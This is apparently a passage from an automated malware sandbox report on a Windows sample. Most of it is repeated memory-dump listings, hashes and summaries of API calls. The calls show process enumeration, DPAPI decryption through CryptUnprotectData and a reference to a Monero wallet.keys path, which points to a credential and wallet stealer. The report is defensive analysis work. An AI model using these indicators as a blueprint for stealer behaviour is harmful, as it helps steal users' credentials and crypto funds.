                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: cf8a9fb95bd531f6813e58704245400b40b2262e20f565fb31b1dd8b6c0b3025
                        • Instruction ID: 9406acd591d41f6b8d0cabd64bbec648d6305d4cc983e47e9076c9752c00aafa
                        • Opcode Fuzzy Hash: cf8a9fb95bd531f6813e58704245400b40b2262e20f565fb31b1dd8b6c0b3025
                        • Instruction Fuzzy Hash: 5D012979A00208EFDB14DFA6C948BEDB7F8EB08301F144199A90AA6240DB349B88DF51
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: (^Y~$gr-z$i^Yo$>;
                        • API String ID: 0-3191279034
                        • Opcode ID: 45568d45ed564fd7c74f1ff25e5fcc04f0df532599e39b05c9d20e2f56f747d4
                        • Instruction ID: 36a107f4a675c26d7bcdb9a6c3ea5eff5e76c0938b69bbb58d59ae9d3b56a0bc
                        • Opcode Fuzzy Hash: 45568d45ed564fd7c74f1ff25e5fcc04f0df532599e39b05c9d20e2f56f747d4
                        • Instruction Fuzzy Hash: E382E6F26086049FE304AE2DEC8567AFBE9EF94720F16893DE6C4C3344E63598458797
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C605B7), ref: 00C586CA
                        • Process32First.KERNEL32(?,00000128), ref: 00C586DE
                        • Process32Next.KERNEL32(?,00000128), ref: 00C586F3
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • CloseHandle.KERNEL32(?), ref: 00C58761
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 35613ba527fcdfa0dd49acfd75aedc093dd0674afefd318d89fe2cf6b0bdd13d
                        • Instruction ID: d3b531488b4ea67f366130334ac0524bf74f5810f6c173c24248c7eea1ffaa8f
                        • Opcode Fuzzy Hash: 35613ba527fcdfa0dd49acfd75aedc093dd0674afefd318d89fe2cf6b0bdd13d
                        • Instruction Fuzzy Hash: D4315E75901218ABDB24DF52CC45FEEB778EB48701F1042A9B90AB2190DB306A89CFA5
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,00C45184,40000001,00000000,00000000,?,00C45184), ref: 00C58EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 2ca4bca0b3286b07b103b337cbc068d154f7e84d95d9206341118e3c4449e911
                        • Instruction ID: 4f0f17512818b047c495fae92a68d46fc173f5a06b4d2b85894d7b408e088167
                        • Opcode Fuzzy Hash: 2ca4bca0b3286b07b103b337cbc068d154f7e84d95d9206341118e3c4449e911
                        • Instruction Fuzzy Hash: F9114C78200204BFDB00CFA5DC89FA733A9AF89305F109558FD199B250DB75ED89DB64
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C44EEE,00000000,00000000), ref: 00C49AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,00C44EEE,00000000,?), ref: 00C49B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C44EEE,00000000,00000000), ref: 00C49B2A
                        • LocalFree.KERNEL32(?,?,?,?,00C44EEE,00000000,?), ref: 00C49B3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID:
                        • API String ID: 4291131564-0
                        • Opcode ID: 38a720d7deed5777a47788ca835641f4ddccc3a3a810444d3325cdcc38440275
                        • Instruction ID: dcf60e7ee7dcfd4ff425225f23a2ad0521f04207ae719321da9add337882d7e1
                        • Opcode Fuzzy Hash: 38a720d7deed5777a47788ca835641f4ddccc3a3a810444d3325cdcc38440275
                        • Instruction Fuzzy Hash: 3911A4B4240208AFEB14CF64DC95FAA77B5FB89700F208059FA199B390C775AA01CB50
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C60E00,00000000,?), ref: 00C579B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C579B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,00C60E00,00000000,?), ref: 00C579C4
                        • wsprintfA.USER32 ref: 00C579F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: d7edbb9c3730afad7edfc1440e72ed3716e6a1cb951c36cc3e0d526576d6cf6d
                        • Instruction ID: 748bd47be77aa47e5e37a9707ebac04995bf7ea08fc5d58909948d7221f61452
                        • Opcode Fuzzy Hash: d7edbb9c3730afad7edfc1440e72ed3716e6a1cb951c36cc3e0d526576d6cf6d
                        • Instruction Fuzzy Hash: 8D112AB2904118ABDB14DFCADD45BBEB7F8FB4CB11F14421AF605A2280E3395944D7B5
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,008A01F8,00000000,?,00C60E10,00000000,?,00000000,00000000), ref: 00C57A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C57A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,008A01F8,00000000,?,00C60E10,00000000,?,00000000,00000000,?), ref: 00C57A7D
                        • wsprintfA.USER32 ref: 00C57AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: 4ac5e61c8fa6f331335f60bb933db92377a2e866fcb3baf2164a1e94319a5d5e
                        • Instruction ID: 9d5569b1aaf6c74c1f6d3997ad1577f3c722059baf26db2b6e7e214f0b9b5414
                        • Opcode Fuzzy Hash: 4ac5e61c8fa6f331335f60bb933db92377a2e866fcb3baf2164a1e94319a5d5e
                        • Instruction Fuzzy Hash: A81182B1945218DFEB208B55DC49F59B778F704711F1043A6E91AA32C0D7741A84CF51
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 72_$:.~$ ?o
                        • API String ID: 0-513434595
                        • Opcode ID: b900dc054c837cb418e763aebecd7494a9f8781802ff27657921e19e07301293
                        • Instruction ID: 071b5bb4f66f7c1f550efa795f5327538d711b5d785fb551cd2c5fa984a55cf1
                        • Opcode Fuzzy Hash: b900dc054c837cb418e763aebecd7494a9f8781802ff27657921e19e07301293
                        • Instruction Fuzzy Hash: 3AB217F360C200AFE3086E2DEC8577ABBE5EFD4720F1A853DE6C587744EA3558058696
                        APIs
                        • CoCreateInstance.COMBASE(00C5E118,00000000,00000001,00C5E108,00000000), ref: 00C53758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00C537B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 643a11895f6a48d19ac574a780d00775889845d5765dbacfcc023f73cbc55299
                        • Instruction ID: d1293a44617ade847714dc64c3324ed7b2a552a948cdffe0c99b5ce2d1526e28
                        • Opcode Fuzzy Hash: 643a11895f6a48d19ac574a780d00775889845d5765dbacfcc023f73cbc55299
                        • Instruction Fuzzy Hash: 56410975A00A289FDB24DB58CC94B9BB7B4BB48702F4041D9E608E72D0E7716EC9CF50
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C49B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C49BA3
                        • LocalFree.KERNEL32(?), ref: 00C49BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: 5acfb958773f2c641c840113059165a752a17360dd937df822776a6e3feef1f5
                        • Instruction ID: acaf10388dda56190af7453c5adcea1d10b632891e65624825428bc0075b2290
                        • Opcode Fuzzy Hash: 5acfb958773f2c641c840113059165a752a17360dd937df822776a6e3feef1f5
                        • Instruction Fuzzy Hash: 8E11C9B8A00209EFDB04DF94D989AAEB7B5FF88300F1445A9E915A7350D774AE14CFA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: R89$q%y{
                        • API String ID: 0-252007074
                        • Opcode ID: 3817c0859691b447f4767926e6437fe81c89187a28c9333a4e92a913c2fe2b7d
                        • Instruction ID: fbbd31cf95c3bee22b67586fbe18a421812008f042a057abee829864bdeeec92
                        • Opcode Fuzzy Hash: 3817c0859691b447f4767926e6437fe81c89187a28c9333a4e92a913c2fe2b7d
                        • Instruction Fuzzy Hash: 91B219F3A0C2049FE304AE2DEC8567ABBE5EFD4320F16893DE6C5C7344EA3558058696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 7\~$=:w
                        • API String ID: 0-3789187258
                        • Opcode ID: 9b7dfd4de10312fa711557acc95b5e4413ba0c8623cc769e8ee77763fdc362b4
                        • Instruction ID: b6c1f31b10a3fabb0134777f766634b3497ea6b2dfb72124dc1257bdcddafe3a
                        • Opcode Fuzzy Hash: 9b7dfd4de10312fa711557acc95b5e4413ba0c8623cc769e8ee77763fdc362b4
                        • Instruction Fuzzy Hash: 0D51C3F2A0C6049FF701BE29DC85B6AB7D5EF94310F16893CE6C883344EA3558158787
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
